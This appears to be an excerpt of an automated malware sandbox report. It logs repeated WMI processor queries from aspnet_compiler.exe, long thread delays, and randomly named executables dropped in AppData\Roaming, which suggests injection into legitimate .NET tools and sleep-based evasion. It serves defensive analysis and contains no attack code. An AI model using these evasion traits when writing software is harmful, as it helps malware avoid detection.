Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor

Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed
Source: C:\Windows\SysWOW64\PING.EXE	Last function: Thread delayed
Source: C:\Windows\System32\conhost.exe	Last function: Thread delayed

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe

Code function: 3_2_0041B6EA FindFirstFileExW,

3_2_0041B6EA

Source: C:\Users\user\Desktop\PT54FFSL7ET46RASB.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\HPd7I3vQri.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\yTRfYxWiym.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe	Thread delayed: delay time: 922337203685477	Jump to behavior
Source: C:\Users\user\AppData\Roaming\ArgumentCount\Current.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 922337203685477
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 60000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59812
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59683
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59562
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59446
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59328
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59214
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 180000
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59984
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59873
Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\aspnet_compiler.exe	Thread delayed: delay time: 59763
